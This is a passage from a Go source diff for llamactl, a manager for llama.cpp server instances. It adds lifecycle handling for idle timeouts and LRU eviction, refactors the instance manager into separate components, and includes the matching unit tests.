		inputTimeout    *int
		expectedTimeout int
	}{
		{"default value when nil", nil, 0},
		{"positive value", testutil.IntPtr(10), 10},
		{"zero value", testutil.IntPtr(0), 0},
		{"negative value gets corrected", testutil.IntPtr(-5), 0},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			options := &instance.CreateInstanceOptions{
				IdleTimeout: tt.inputTimeout,
				BackendType: backends.BackendTypeLlamaCpp,
				LlamaServerOptions: &llamacpp.LlamaServerOptions{
					Model: "/path/to/model.gguf",
				},
			}

			// Mock onStatusChange function
			mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}

			inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
			opts := inst.GetOptions()

			// Report the dereferenced value: formatting the *int itself would
			// print a pointer address, which makes a failure unreadable.
			if opts.IdleTimeout == nil {
				t.Errorf("Expected IdleTimeout %d, got nil", tt.expectedTimeout)
				return
			}
			if got := *opts.IdleTimeout; got != tt.expectedTimeout {
				t.Errorf("Expected IdleTimeout %d, got %d", tt.expectedTimeout, got)
			}
		})
	}
}

152
pkg/manager/lifecycle.go Normal file
View File

@@ -0,0 +1,152 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
"sync"
"time"
)
// lifecycleManager handles background timeout checking and LRU eviction.
// It properly coordinates shutdown to prevent races with the timeout checker.
type lifecycleManager struct {
// registry is where the instances to check or evict are looked up.
registry *instanceRegistry
manager InstanceManager // For calling Stop/Evict operations
// ticker fires once per checkInterval and drives timeoutCheckLoop.
ticker *time.Ticker
// checkInterval is the period between timeout checks; newLifecycleManager
// falls back to 5 minutes when a non-positive value is given.
checkInterval time.Duration
// enableLRU gates evictLRU, which returns an error when it is false.
enableLRU bool
// shutdownChan is closed by stop() to tell timeoutCheckLoop to exit.
shutdownChan chan struct{}
// shutdownDone is closed by timeoutCheckLoop when it returns.
shutdownDone chan struct{}
// shutdownOnce makes stop() run its shutdown sequence only once.
shutdownOnce sync.Once
}
// newLifecycleManager builds a lifecycle manager for the given registry and
// instance manager. A non-positive checkInterval is replaced by 5 minutes.
// The ticker is created here, but the check loop only runs after start().
func newLifecycleManager(
	registry *instanceRegistry,
	manager InstanceManager,
	checkInterval time.Duration,
	enableLRU bool,
) *lifecycleManager {
	interval := checkInterval
	if interval <= 0 {
		interval = 5 * time.Minute // Default to 5 minutes
	}

	lm := new(lifecycleManager)
	lm.registry = registry
	lm.manager = manager
	lm.ticker = time.NewTicker(interval)
	lm.checkInterval = interval
	lm.enableLRU = enableLRU
	lm.shutdownChan = make(chan struct{})
	lm.shutdownDone = make(chan struct{})
	return lm
}
// start launches the timeout checking loop in its own goroutine and returns
// immediately.
func (l *lifecycleManager) start() {
	loop := l.timeoutCheckLoop
	go loop()
}
// stop gracefully shuts the lifecycle manager down; repeated calls are no-ops.
//
// It signals the check loop to exit, waits until the loop has actually
// finished (so no timeout check can overlap with instance cleanup), and only
// then stops the ticker. shutdownDone is closed by timeoutCheckLoop, so this
// call waits for that loop to return.
func (l *lifecycleManager) stop() {
	shutdown := func() {
		close(l.shutdownChan)
		<-l.shutdownDone // Wait for checker to finish (prevents shutdown race)
		l.ticker.Stop()
	}
	l.shutdownOnce.Do(shutdown)
}
// timeoutCheckLoop runs a timeout check on every ticker tick until
// shutdownChan is closed. On exit it closes shutdownDone so that stop() can
// proceed.
func (l *lifecycleManager) timeoutCheckLoop() {
	defer close(l.shutdownDone) // Signal completion

	for {
		select {
		case <-l.shutdownChan:
			// Shutdown requested: leave the goroutine.
			return
		case <-l.ticker.C:
			l.checkTimeouts()
		}
	}
}
// checkTimeouts stops every local, running instance whose idle timeout has
// expired. Candidates are collected first and stopped afterwards; the outcome
// of each stop is logged.
func (l *lifecycleManager) checkTimeouts() {
	var expired []string

	for _, candidate := range l.registry.list() {
		// Remote instances are managed by their respective nodes, and only
		// instances the registry considers running are eligible.
		if candidate.IsRemote() || !l.registry.isRunning(candidate.Name) {
			continue
		}
		if candidate.ShouldTimeout() {
			expired = append(expired, candidate.Name)
		}
	}

	for _, name := range expired {
		log.Printf("Instance %s has timed out, stopping it", name)

		_, err := l.manager.StopInstance(name)
		if err != nil {
			log.Printf("Error stopping instance %s: %v", name, err)
			continue
		}
		log.Printf("Instance %s stopped successfully", name)
	}
}
// evictLRU finds and stops the least recently used running instance.
// This is called when max running instances limit is reached.
//
// Only local instances with a positive idle timeout are candidates. Remote
// instances are managed by their own nodes, and instances with missing
// options, a nil IdleTimeout or a non-positive IdleTimeout are treated as
// "timeout disabled" (the same rule the idle timeout check uses) and are
// never evicted.
//
// It returns an error when LRU eviction is disabled, when no candidate
// exists, or when stopping the chosen instance fails.
func (l *lifecycleManager) evictLRU() error {
	if !l.enableLRU {
		return fmt.Errorf("LRU eviction is not enabled")
	}

	var lruInstance *instance.Instance
	for _, inst := range l.registry.listRunning() {
		// Skip remote instances - they are managed by their respective nodes
		if inst.IsRemote() {
			continue
		}

		// Read the options once so the nil checks and the dereference all
		// look at the same snapshot.
		opts := inst.GetOptions()
		if opts == nil || opts.IdleTimeout == nil || *opts.IdleTimeout <= 0 {
			continue
		}

		if lruInstance == nil || inst.LastRequestTime() < lruInstance.LastRequestTime() {
			lruInstance = inst
		}
	}

	if lruInstance == nil {
		return fmt.Errorf("failed to find lru instance")
	}

	// Evict the LRU instance
	log.Printf("Evicting LRU instance %s", lruInstance.Name)
	_, err := l.manager.StopInstance(lruInstance.Name)
	return err
}

View File

@@ -0,0 +1,220 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
// TestInstanceTimeoutLogic checks the idle timeout decision of a running
// instance: no timeout right after a request, timeout once the mocked clock
// has moved past the configured idle period.
func TestInstanceTimeoutLogic(t *testing.T) {
	mgr := createTestManager(t)
	defer mgr.Shutdown()

	timeoutMinutes := 1 // 1 minute
	inst := createInstanceWithTimeout(t, mgr, "timeout-test", "/path/to/model.gguf", &timeoutMinutes)

	// Drive the instance from a mock clock.
	clock := NewMockTimeProvider(time.Now())
	inst.SetTimeProvider(clock)

	// The timeout logic only applies to running instances.
	inst.SetStatus(instance.Running)
	defer inst.SetStatus(instance.Stopped)

	inst.UpdateLastRequestTime()

	// Just updated, so the instance must not be considered idle yet.
	if timedOut := inst.ShouldTimeout(); timedOut {
		t.Error("Instance should not timeout immediately after request")
	}

	// Two minutes later the one minute timeout has elapsed.
	clock.SetTime(time.Now().Add(2 * time.Minute))

	if timedOut := inst.ShouldTimeout(); !timedOut {
		t.Error("Instance should timeout after idle period")
	}
}
// TestInstanceWithoutTimeoutNeverExpires checks that an instance created
// without an idle timeout does not report a timeout, even after the mocked
// clock advances by a full day.
func TestInstanceWithoutTimeoutNeverExpires(t *testing.T) {
	mgr := createTestManager(t)
	defer mgr.Shutdown()

	inst := createInstanceWithTimeout(t, mgr, "no-timeout-test", "/path/to/model.gguf", nil)

	clock := NewMockTimeProvider(time.Now())
	inst.SetTimeProvider(clock)

	inst.SetStatus(instance.Running)
	defer inst.SetStatus(instance.Stopped)

	inst.UpdateLastRequestTime()

	// Advance time significantly
	clock.SetTime(clock.Now().Add(24 * time.Hour))

	if timedOut := inst.ShouldTimeout(); timedOut {
		t.Error("Instance without timeout configuration should never timeout")
	}
}
// TestEvictLRUInstance_Success creates three running instances with staggered
// last request times and checks that EvictLRUInstance stops only the one
// with the oldest request.
func TestEvictLRUInstance_Success(t *testing.T) {
	mgr := createTestManager(t)
	defer mgr.Shutdown()

	// Idle timeout must be enabled for eviction; the value itself is irrelevant.
	validTimeout := 1
	oldest := createInstanceWithTimeout(t, mgr, "instance-1", "/path/to/model1.gguf", &validTimeout)
	middle := createInstanceWithTimeout(t, mgr, "instance-2", "/path/to/model2.gguf", &validTimeout)
	newest := createInstanceWithTimeout(t, mgr, "instance-3", "/path/to/model3.gguf", &validTimeout)
	all := []*instance.Instance{oldest, middle, newest}

	// Share one mock clock and mark every instance as running.
	clock := NewMockTimeProvider(time.Now())
	for _, inst := range all {
		inst.SetTimeProvider(clock)
	}
	for _, inst := range all {
		inst.SetStatus(instance.Running)
	}

	defer func() {
		// Clean up - ensure all instances are stopped
		for _, inst := range all {
			if inst.IsRunning() {
				inst.SetStatus(instance.Stopped)
			}
		}
	}()

	// Record requests one minute apart, oldest first, so instance-1 is the LRU.
	for idx, inst := range all {
		if idx > 0 {
			clock.SetTime(clock.Now().Add(1 * time.Minute))
		}
		inst.UpdateLastRequestTime()
	}

	if err := mgr.EvictLRUInstance(); err != nil {
		t.Fatalf("EvictLRUInstance failed: %v", err)
	}

	// Only the least recently used instance may have been stopped.
	if oldest.IsRunning() {
		t.Error("Expected instance-1 to be stopped after eviction")
	}
	if !middle.IsRunning() {
		t.Error("Expected instance-2 to still be running")
	}
	if !newest.IsRunning() {
		t.Error("Expected instance-3 to still be running")
	}
}
// TestEvictLRUInstance_NoRunningInstances checks that EvictLRUInstance fails
// with the "failed to find lru instance" error when nothing is running.
func TestEvictLRUInstance_NoRunningInstances(t *testing.T) {
	manager := createTestManager(t)
	defer manager.Shutdown()

	err := manager.EvictLRUInstance()
	if err == nil {
		// Stop here: calling err.Error() on a nil error below would panic
		// instead of reporting a clean test failure.
		t.Fatal("Expected error when no running instances exist")
	}
	if err.Error() != "failed to find lru instance" {
		t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
	}
}
// TestEvictLRUInstance_OnlyEvictsTimeoutEnabledInstances runs a mix of
// instances with and without an idle timeout and checks that eviction only
// ever picks the instance that has a timeout enabled.
func TestEvictLRUInstance_OnlyEvictsTimeoutEnabledInstances(t *testing.T) {
	mgr := createTestManager(t)
	defer mgr.Shutdown()

	// One evictable instance (timeout enabled) and two that must be left alone
	// (timeout of zero, and no timeout given at all).
	validTimeout := 1
	zeroTimeout := 0
	evictable := createInstanceWithTimeout(t, mgr, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
	zeroConfigured := createInstanceWithTimeout(t, mgr, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
	unconfigured := createInstanceWithTimeout(t, mgr, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)

	all := []*instance.Instance{evictable, zeroConfigured, unconfigured}
	for _, inst := range all {
		inst.SetStatus(instance.Running)
		inst.UpdateLastRequestTime()
	}

	defer func() {
		// Reset instances to stopped to avoid shutdown panics
		for _, inst := range all {
			if inst.IsRunning() {
				inst.SetStatus(instance.Stopped)
			}
		}
	}()

	if err := mgr.EvictLRUInstance(); err != nil {
		t.Fatalf("EvictLRUInstance failed: %v", err)
	}

	// Only the timeout-enabled instance may have been evicted.
	if evictable.IsRunning() {
		t.Error("Expected with-timeout instance to be stopped after eviction")
	}
	if !zeroConfigured.IsRunning() {
		t.Error("Expected no-timeout-1 instance to still be running")
	}
	if !unconfigured.IsRunning() {
		t.Error("Expected no-timeout-2 instance to still be running")
	}
}
// createInstanceWithTimeout is a test helper that creates a llama.cpp
// instance with the given name, model path and idle timeout (nil for "not
// set") through the manager. It fails the test immediately if creation fails.
func createInstanceWithTimeout(t *testing.T, manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
	t.Helper()

	backendOpts := backends.Options{
		BackendType: backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &backends.LlamaServerOptions{
			Model: model,
		},
	}
	opts := &instance.Options{
		IdleTimeout:    timeout,
		BackendOptions: backendOpts,
	}

	created, err := manager.CreateInstance(name, opts)
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}
	return created
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -1,298 +1,297 @@
package manager
import (
"encoding/json"
"context"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*instance.Process, error)
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
GetInstance(name string) (*instance.Process, error)
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
ListInstances() ([]*instance.Instance, error)
CreateInstance(name string, options *instance.Options) (*instance.Instance, error)
GetInstance(name string) (*instance.Instance, error)
UpdateInstance(name string, options *instance.Options) (*instance.Instance, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
StartInstance(name string) (*instance.Instance, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
StopInstance(name string) (*instance.Instance, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
RestartInstance(name string) (*instance.Instance, error)
GetInstanceLogs(name string, numLines int) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
backendsConfig config.BackendConfig
// Components (each with own synchronization)
registry *instanceRegistry
ports *portAllocator
persistence *instancePersister
remote *remoteManager
lifecycle *lifecycleManager
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
// Configuration
globalConfig *config.AppConfig
// Synchronization
instanceLocks sync.Map // map[string]*sync.Mutex - per-instance locks for concurrent operations
shutdownOnce sync.Once
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(backendsConfig config.BackendConfig, instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
backendsConfig: backendsConfig,
// New creates a new instance of InstanceManager.
func New(globalConfig *config.AppConfig) InstanceManager {
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
if globalConfig.Instances.TimeoutCheckInterval <= 0 {
globalConfig.Instances.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
// Initialize components
registry := newInstanceRegistry()
// Initialize port allocator
portRange := globalConfig.Instances.PortRange
ports := newPortAllocator(portRange[0], portRange[1])
// Initialize persistence
persistence := newInstancePersister(globalConfig.Instances.InstancesDir)
// Initialize remote manager
remote := newRemoteManager(globalConfig.Nodes, 30*time.Second)
// Create manager instance
im := &instanceManager{
registry: registry,
ports: ports,
persistence: persistence,
remote: remote,
globalConfig: globalConfig,
}
// Initialize lifecycle manager (needs reference to manager for Stop/Evict operations)
checkInterval := time.Duration(globalConfig.Instances.TimeoutCheckInterval) * time.Minute
im.lifecycle = newLifecycleManager(registry, im, checkInterval, true)
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
// Start the lifecycle manager
im.lifecycle.start()
return im
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}
// persistInstance saves an instance to its JSON file
func (im *instanceManager) persistInstance(instance *instance.Process) error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(instance, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
}
// Write to temporary file first
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
}
// Atomic rename
if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath) // Clean up temp file
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
}
return nil
// persistInstance saves an instance using the persistence component
func (im *instanceManager) persistInstance(inst *instance.Instance) error {
return im.persistence.save(inst)
}
func (im *instanceManager) Shutdown() {
im.mu.Lock()
im.shutdownOnce.Do(func() {
// 1. Stop lifecycle manager (stops timeout checker)
im.lifecycle.stop()
// Check if already shutdown
if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
// 2. Get running instances (no lock needed - registry handles it)
running := im.registry.listRunning()
// Signal the timeout checker to stop
close(im.shutdownChan)
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
// Attempt to stop the instance gracefully
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
// 3. Stop local instances concurrently
var wg sync.WaitGroup
for _, inst := range running {
if inst.IsRemote() {
continue // Skip remote instances
}
}(runningNames[i], inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
wg.Add(1)
go func(inst *instance.Instance) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", inst.Name)
if err := inst.Stop(); err != nil {
log.Printf("Error stopping instance %s: %v\n", inst.Name, err)
}
}(inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
})
}
// loadInstances restores all instances from disk
// loadInstances restores all instances from disk using the persistence component
func (im *instanceManager) loadInstances() error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
// Check if instances directory exists
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
return nil // No instances directory, start fresh
}
// Read all JSON files from instances directory
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
// Load all instances from persistence
instances, err := im.persistence.loadAll()
if err != nil {
return fmt.Errorf("failed to read instances directory: %w", err)
return fmt.Errorf("failed to load instances: %w", err)
}
loadedCount := 0
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
if len(instances) == 0 {
return nil
}
// Process each loaded instance
for _, persistedInst := range instances {
if err := im.loadInstance(persistedInst); err != nil {
log.Printf("Failed to load instance %s: %v", persistedInst.Name, err)
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
if err := im.loadInstance(instanceName, instancePath); err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
continue
}
loadedCount++
}
if loadedCount > 0 {
log.Printf("Loaded %d instances from persistence", loadedCount)
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
}
log.Printf("Loaded %d instances from persistence", len(instances))
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
return nil
}
// loadInstance loads a single instance from its JSON file
func (im *instanceManager) loadInstance(name, path string) error {
data, err := os.ReadFile(path)
if err != nil {
return fmt.Errorf("failed to read instance file: %w", err)
// loadInstance loads a single persisted instance and adds it to the registry
func (im *instanceManager) loadInstance(persistedInst *instance.Instance) error {
name := persistedInst.Name
options := persistedInst.GetOptions()
// Check if this is a remote instance (local node not in the Nodes set)
var isRemote bool
var nodeName string
if options != nil {
if _, isLocal := options.Nodes[im.globalConfig.LocalNode]; !isLocal && len(options.Nodes) > 0 {
// Get the first node from the set
for node := range options.Nodes {
nodeName = node
isRemote = true
break
}
}
}
var persistedInstance instance.Process
if err := json.Unmarshal(data, &persistedInstance); err != nil {
return fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if persistedInstance.Name != name {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
var statusCallback func(oldStatus, newStatus instance.Status)
if !isRemote {
// Only set status callback for local instances
statusCallback = func(oldStatus, newStatus instance.Status) {
im.onStatusChange(name, oldStatus, newStatus)
}
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
inst := instance.New(name, im.globalConfig, options, statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.SetStatus(persistedInstance.Status)
inst.Created = persistedInst.Created
inst.SetStatus(persistedInst.GetStatus())
// Check for port conflicts and add to maps
if inst.GetPort() > 0 {
port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
// Handle remote instance mapping
if isRemote {
// Map instance to node in remote manager
if err := im.remote.setInstanceNode(name, nodeName); err != nil {
return fmt.Errorf("failed to set instance node: %w", err)
}
} else {
// Allocate port for local instances
if inst.GetPort() > 0 {
port := inst.GetPort()
if err := im.ports.allocateSpecific(port, name); err != nil {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use: %w", name, port, err)
}
}
im.ports[port] = true
}
im.instances[name] = inst
// Add instance to registry
if err := im.registry.add(inst); err != nil {
return fmt.Errorf("failed to add instance to registry: %w", err)
}
return nil
}
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
// For instances with auto-restart disabled, it sets their status to Stopped
func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
instances := im.registry.list()
var instancesToStart []*instance.Instance
var instancesToStop []*instance.Instance
for _, inst := range instances {
if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
inst.GetOptions().AutoRestart != nil {
if *inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
} else {
// Instance was running but auto-restart is disabled, mark as stopped
instancesToStop = append(instancesToStop, inst)
}
}
}
im.mu.RUnlock()
// Stop instances that have auto-restart disabled
for _, inst := range instancesToStop {
log.Printf("Instance %s was running but auto-restart is disabled, setting status to stopped", inst.Name)
inst.SetStatus(instance.Stopped)
im.registry.markStopped(inst.Name)
}
// Start instances that have auto-restart enabled
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
im.registry.markStopped(inst.Name)
// Check if this is a remote instance
if node, exists := im.remote.getNodeForInstance(inst.Name); exists && node != nil {
// Remote instance - use remote manager with context
ctx := context.Background()
if _, err := im.remote.startInstance(ctx, node, inst.Name); err != nil {
log.Printf("Failed to auto-start remote instance %s: %v", inst.Name, err)
}
} else {
// Local instance - call Start() directly
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
}
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.Status) {
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
im.registry.markRunning(name)
} else {
delete(im.runningInstances, name)
im.registry.markStopped(name)
}
}
// getNodeForInstance resolves the node configuration backing a remote instance.
// The result is nil when inst reports itself as non-remote, or when the remote
// manager holds no node mapping for the instance's name.
func (im *instanceManager) getNodeForInstance(inst *instance.Instance) *config.NodeConfig {
	if inst.IsRemote() {
		// Only remote instances are looked up in the remote manager's mapping.
		if mapped, found := im.remote.getNodeForInstance(inst.Name); found {
			return mapped
		}
	}
	return nil
}
// lockInstance looks up the mutex registered under the given instance name,
// storing a fresh one first if none exists yet. Because every instance name
// gets its own mutex, operations on different instances can proceed
// concurrently while operations on the same instance are serialized.
// The mutex is returned unlocked; the caller is responsible for locking it.
func (im *instanceManager) lockInstance(name string) *sync.Mutex {
	entry, _ := im.instanceLocks.LoadOrStore(name, new(sync.Mutex))
	mu := entry.(*sync.Mutex)
	return mu
}
// unlockAndCleanup releases the per-instance mutex stored under name and then
// drops its entry from the lock map. It is a no-op when no entry exists.
// Intended only for the instance-deletion path, so that lock entries for
// deleted instances do not accumulate.
func (im *instanceManager) unlockAndCleanup(name string) {
	entry, found := im.instanceLocks.Load(name)
	if !found {
		return
	}
	// Unlock first, then forget the entry.
	entry.(*sync.Mutex).Unlock()
	im.instanceLocks.Delete(name)
}

View File

@@ -3,78 +3,28 @@ package manager_test
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
"strings"
"sync"
"testing"
)
// TestNewInstanceManager verifies that a freshly constructed manager is
// non-nil and starts out with an empty instance list.
func TestNewInstanceManager(t *testing.T) {
	backendsCfg := config.BackendConfig{
		LlamaCpp: config.BackendSettings{Command: "llama-server"},
		MLX:      config.BackendSettings{Command: "mlx_lm.server"},
	}
	instancesCfg := config.InstancesConfig{
		PortRange:            [2]int{8000, 9000},
		LogsDir:              "/tmp/test",
		MaxInstances:         5,
		DefaultAutoRestart:   true,
		DefaultMaxRestarts:   3,
		DefaultRestartDelay:  5,
		TimeoutCheckInterval: 5,
	}

	mgr := manager.NewInstanceManager(backendsCfg, instancesCfg)
	if mgr == nil {
		t.Fatal("NewInstanceManager returned nil")
	}

	// A new manager must not report any instances.
	listed, err := mgr.ListInstances()
	if err != nil {
		t.Fatalf("ListInstances failed: %v", err)
	}
	if count := len(listed); count != 0 {
		t.Errorf("Expected empty instance list, got %d instances", count)
	}
}
func TestPersistence(t *testing.T) {
func TestManager_PersistsAndLoadsInstances(t *testing.T) {
tempDir := t.TempDir()
appConfig := createTestAppConfig(tempDir)
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
TimeoutCheckInterval: 5,
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(backendConfig, cfg)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
// Create instance and check file was created
manager1 := manager.New(appConfig)
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
@@ -83,14 +33,13 @@ func TestPersistence(t *testing.T) {
t.Fatalf("CreateInstance failed: %v", err)
}
// Check that JSON file was created
expectedPath := filepath.Join(tempDir, "test-instance.json")
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(backendConfig, cfg)
// Load instances from disk
manager2 := manager.New(appConfig)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
@@ -101,15 +50,31 @@ func TestPersistence(t *testing.T) {
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
}
}
// Test port map populated from loaded instances (port conflict should be detected)
_, err = manager2.CreateInstance("new-instance", options) // Same port
if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
func TestDeleteInstance_RemovesPersistenceFile(t *testing.T) {
tempDir := t.TempDir()
appConfig := createTestAppConfig(tempDir)
mgr := manager.New(appConfig)
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
// Test file deletion on instance deletion
err = manager2.DeleteInstance("test-instance")
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
expectedPath := filepath.Join(tempDir, "test-instance.json")
err = mgr.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
@@ -120,7 +85,7 @@ func TestPersistence(t *testing.T) {
}
func TestConcurrentAccess(t *testing.T) {
mgr := createTestManager()
mgr := createTestManager(t)
defer mgr.Shutdown()
// Test concurrent operations
@@ -132,10 +97,12 @@ func TestConcurrentAccess(t *testing.T) {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
